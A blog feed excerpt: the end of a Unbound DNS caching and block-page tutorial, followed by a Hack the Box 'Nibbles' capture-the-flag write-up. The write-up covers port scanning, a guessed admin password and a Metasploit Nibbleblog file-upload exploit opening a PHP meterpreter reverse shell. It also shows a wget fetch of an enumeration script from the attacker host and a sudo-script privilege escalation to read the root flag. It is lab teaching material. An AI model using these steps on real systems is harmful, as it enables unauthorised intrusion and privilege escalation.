<p><a href="/images/unbound-dns/unbound-13.png"><img src="/images/unbound-dns/unbound-13.png" /></a></p>
<p>Sometimes our DNS cache server will not reply to our query, in the meantime, we can use flush command to remove information such as A, AAA, NS, SO, CNAME, MX, PTR etc.. records from DNS cache. We can remove all information using flush_zone this will remove all informations.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control flush www.google.com
<span class="gp">#</span><span class="w"> </span>unbound-control flush_zone bing.com
</code></pre></div></div>
<p>To check which forwards are currently used to resolve.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>unbound-control list_forwards
</code></pre></div></div>
<p><a href="/images/unbound-dns/unbound-14.png"><img src="/images/unbound-dns/unbound-14.png" /></a></p>
<p>now it’s time to restart the network using following command.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>/etc/init.d/network restart
</code></pre></div></div>
<h2 id="setting-up-apache-server-to-serve-the-block-page">Setting Up Apache Server to serve the Block Page</h2>
<p>let’s make a directory for keeping our block page files and for the log files</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span><span class="nb">mkdir</span> <span class="nt">-p</span> /var/log/httpd/blocking.com
</code></pre></div></div>
<p>Lets Uncomment 404 page and add /index.php or the path from /etc/httpd/conf/httpd.conf for serving our custom page</p>
<p><a href="/images/unbound-dns/unbound-15.png"><img src="/images/unbound-dns/unbound-15.png" /></a></p>
<p>Now let’s make the necessary changes in our block page and start our apache server</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">#</span><span class="w"> </span>systemctl restart httpd.service
</code></pre></div></div>
<p>Finally, if we start our unbound DNS Server and browse to any website which is included in the block list we will be greeted with this <strong>Block Page</strong></p>
<p><a href="/images/unbound-dns/unbound-16.png"><img src="/images/unbound-dns/unbound-16.png" /></a></p>Steffin StanlyToday we will learn how to create our own recursive DNS server using Unbound. This will improve performance through caching. We will also look at blocking unwanted pages.Hack the Box: Nibbles Writeup2018-06-06T00:00:00+00:002018-06-06T00:00:00+00:00https://steffinstanly.github.io/Hack-the-Box-Nibbles<p>Today lets see the Hack the Box Machine <strong>Nibbles</strong></p>
<p><a href="/images/nibbles/nibbles.png"><img src="/images/nibbles/nibbles.png" /></a></p>
<p>So let’s start with a TCP SYN scan for service discovery using Nmap to identify open ports and network services on the target machine.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>nmap <span class="nt">-sS</span> <span class="nt">-Pn</span> <span class="nt">-sV</span> <span class="nt">-T4</span> 10.10.10.75
<span class="go">Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-15 23:14 +08
Nmap scan report for 10.10.10.75
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
</span><span class="gp">22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
<span class="go">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1
</span></code></pre></div></div>
<p>The port 80 and 22 are open in our target machine</p>
<p>The port 80 is open, so lets dirb the target machine to identify other interesting directories or pages.
we can also use go-buster to brute-force and identify other interesting directories or pages.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>dirb http://10.10.10.75
<span class="go">-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 25 23:18:52 2018
URL_BASE: http://10.10.10.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.75/ ----
+ http://10.10.10.75/index.html (CODE:200|SIZE:93)
+ http://10.10.10.75/server-status (CODE:403|SIZE:299)
</span></code></pre></div></div>
<p>there’s nothing much useful on the enumeration results.</p>
<p>Now let’s try to manually Enumerate the website</p>
<p><a href="/images/Nibbles website 1.png"><img src="/images/nibbles/Nibbles website 1.png" /></a></p>
<p>Checking the source code we could find a directory</p>
<p><a href="/images/Nibbles website 2.png"><img src="/images/nibbles/Nibbles website 2.png" /></a></p>
<p>On checking the 10.10.10.75/nibbleblog we got the blog home page</p>
<p><a href="/images/Nibbles website 3.png"><img src="/images/nibbles/Nibbles website 3.png" /></a></p>
<p>Now lets again run dirb to find out any interesting directories</p>
<p>Here we got the /nibbleblog/admin.php page
<a href="/images/Nibbles website 4.png"><img src="/images/nibbles/Nibbles website 4.png" /></a></p>
<p>Now lets try to login in manually and by guessing i got the <strong>username</strong> as “<strong>admin</strong>” and <strong>password</strong> as “<strong>nibbles</strong>”</p>
<p><a href="/images/Nibbles website 5.png"><img src="/images/nibbles/Nibbles website 5.png" /></a></p>
<p>Using searchploit I could find an Arbitrary File Upload Vulnerability</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~#</span><span class="w"> </span>searchsploit nibbleblog
<span class="go">------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
Nibbleblog - Multiple SQL Injections | exploits/php/webapps/35865.txt
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</span></code></pre></div></div>
<p>Now let’s try to exploit this vulnerability using Metasploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf ></span><span class="w"> </span>search nibbleblog
<span class="go">
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Nibbleblog File Upload Vulnerability
</span></code></pre></div></div>
<p>Now let’s load the exploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf ></span><span class="w"> </span>use exploit/multi/http/nibbleblog_file_upload
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show options
<span class="go">
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>rhost 10.10.10.75
<span class="gp">rhost =></span><span class="w"> </span>10.10.10.75
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>username admin
<span class="gp">username =></span><span class="w"> </span>admin
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>password nibbles
<span class="gp">password =></span><span class="w"> </span>nibbles
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>targeturi /nibbleblog
<span class="gp">targeturi =></span><span class="w"> </span>/nibbleblog
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show payloads
<span class="go">
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via Perl)
php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6
php/bind_php normal PHP Command Shell, Bind TCP (via PHP)
php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
php/meterpreter/bind_tcp_ipv6 normal PHP Meterpreter, Bind TCP Stager IPv6
php/meterpreter/bind_tcp_ipv6_uuid normal PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
php/meterpreter/bind_tcp_uuid normal PHP Meterpreter, Bind TCP Stager with UUID Support
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP Stager
php/meterpreter/reverse_tcp_uuid normal PHP Meterpreter, PHP Reverse TCP Stager
php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
php/reverse_perl normal PHP Command, Double Reverse TCP Connection (via Perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via PHP)
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>payload php/meterpreter/reverse_tcp
<span class="gp">payload =></span><span class="w"> </span>php/meterpreter/reverse_tcp
<span class="go">
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>show options
<span class="go">
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.10.10.75 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog yes The base path to the web application
USERNAME yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
</span><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span><span class="nb">set </span>lhost 10.10.15.47
<span class="gp">lhost =></span><span class="w"> </span>10.10.15.47
<span class="go">
</span></code></pre></div></div>
<p>Now let’s run the exploit</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">msf exploit(multi/http/nibbleblog_file_upload) ></span><span class="w"> </span>exploit
<span class="go">
[*] Started reverse TCP handler on 10.10.15.47:4444
[*] Sending stage (37775 bytes) to 10.10.10.75
</span><span class="gp">[*] Meterpreter session 1 opened (10.10.15.47:4444 -></span><span class="w"> </span>10.10.10.75:59252<span class="o">)</span> at 2018-06-06 18:49:32 +0530
<span class="go">[+] Deleted image.php
</span><span class="gp">meterpreter ></span><span class="w">
</span><span class="go">
</span></code></pre></div></div>
<p>So now we got the meterpreter session and we are the user</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">cd </span>nibbler
<span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">ls</span>
<span class="go">Listing: /home/nibbler
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 0 fil 2017-12-29 16:00:07 +0530 .bash_history
40755/rwxr-xr-x 4096 dir 2018-06-06 18:53:00 +0530 .git
40775/rwxrwxr-x 4096 dir 2017-12-11 08:34:04 +0530 .nano
100644/rw-r--r-- 1363 fil 2018-06-06 18:51:34 +0530 README.md
100755/rwxr-xr-x 14392 fil 2018-06-06 18:47:25 +0530 dc
100644/rw-r--r-- 4963 fil 2018-06-06 18:46:47 +0530 dc.c
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:38 +0530 doc
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:52 +0530 lib
40755/rwxr-xr-x 4096 dir 2018-06-06 18:48:29 +0530 personal
100400/r-------- 1855 fil 2017-12-29 16:24:29 +0530 personal.zip
40755/rwxr-xr-x 4096 dir 2018-06-06 18:51:40 +0530 tools
100644/rw-r--r-- 3404 fil 2018-06-06 18:51:39 +0530 upc.sh
100400/r-------- 33 fil 2017-12-29 16:13:54 +0530 user.txt
</span><span class="gp">meterpreter ></span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">
</span></code></pre></div></div>
<p>So we got the “<strong>user.txt</strong>”</p>
<p>Got a limited shell inside the meterpreter session</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">meterpreter ></span><span class="w"> </span>shell
<span class="go">Process 122906 created.
Channel 0 created.
ls
README.md
dc
dc.c
doc
files_cache.2177
lib
personal
personal.zip
privileged_cache.2177
tools
upc.sh
user.txt
</span></code></pre></div></div>
<p>Let’s try to spawn a <strong>TTY shell</strong> here from the “<a href="https://netsec.ws/?p=337"><strong>Netsec list</strong></a>”</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">python3 -c 'import pty;</span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w">
</span><span class="go">
</span></code></pre></div></div>
<p>Next, we try to get the <strong>LinEnum.sh</strong> file into our machine for that first I will run a PHP server in my local machine folder</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@kali:~/Desktop/PrivEscalation Enum#</span><span class="w"> </span>php <span class="nt">-S</span> 10.10.15.47:444
<span class="go">PHP 7.2.4-1 Development Server started at Wed Jun 6 18:59:11 2018
Listening on http://10.10.15.47:444
Document root is /root/Desktop/PrivEscalation Enum
Press Ctrl-C to quit.
[Wed Jun 6 19:00:04 2018] 10.10.10.75:35560 [200]: /LinEnum.sh
</span></code></pre></div></div>
<p>Let’s try to transfer the file into our machine using wget</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span>wget http://10.10.15.47:444/LinEnum.sh <span class="nt">-O</span> /tmp/Linenum.sh
<span class="gp"><er/personal/stuff$</span><span class="w"> </span>wget http://10.10.15.47:444/LinEnum.sh <span class="nt">-O</span> /tmp/Linenum.sh
<span class="go">--2018-06-06 10:14:59-- http://10.10.15.47:444/LinEnum.sh
Connecting to 10.10.15.47:444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 42150 (41K) [application/x-sh]
Saving to: '/tmp/Linenum.sh'
</span><span class="gp">/tmp/Linenum.sh 100%[===================></span><span class="o">]</span> 41.16K 43.8KB/s <span class="k">in </span>0.9s
<span class="go">
</span></code></pre></div></div>
<p>so we go the file inside our machine</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/tmp$</span><span class="w"> </span><span class="nb">chmod </span>777 Linenum.sh
<span class="gp">nibbler@Nibbles:/tmp$</span><span class="w"> </span>sh ./Linenum.sh
</code></pre></div></div>
<p>On running Linux enum we got the following</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
</span></code></pre></div></div>
<p>so let’s try to cd into that folder and see</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">ls</span>
<span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span>monitor.sh
<span class="go">
</span></code></pre></div></div>
<p>Now let’s change the contents inside the monitor.sh and try to run it as the root</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">echo</span> <span class="s2">"cat /root/root.txt"</span> <span class="o">></span> monitor.sh
<span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">cat </span>monitor.sh
<span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">cat</span> /root/root.txt
<span class="go">
</span><span class="gp">nibbler@Nibbles:/home/nibbler/personal/stuff$</span><span class="w"> </span><span class="nb">sudo</span> <span class="nt">-u</span> root ./monitor.sh
<span class="go">sudo: unable to resolve host Nibbles: Connection timed out
b6d745c0dfb6457c55591efc898ef88c
</span></code></pre></div></div>
<p>And that’s done and we have finally got the “<strong>root.txt</strong>”</p>Steffin StanlyToday lets see the Hack the Box Machine Nibbles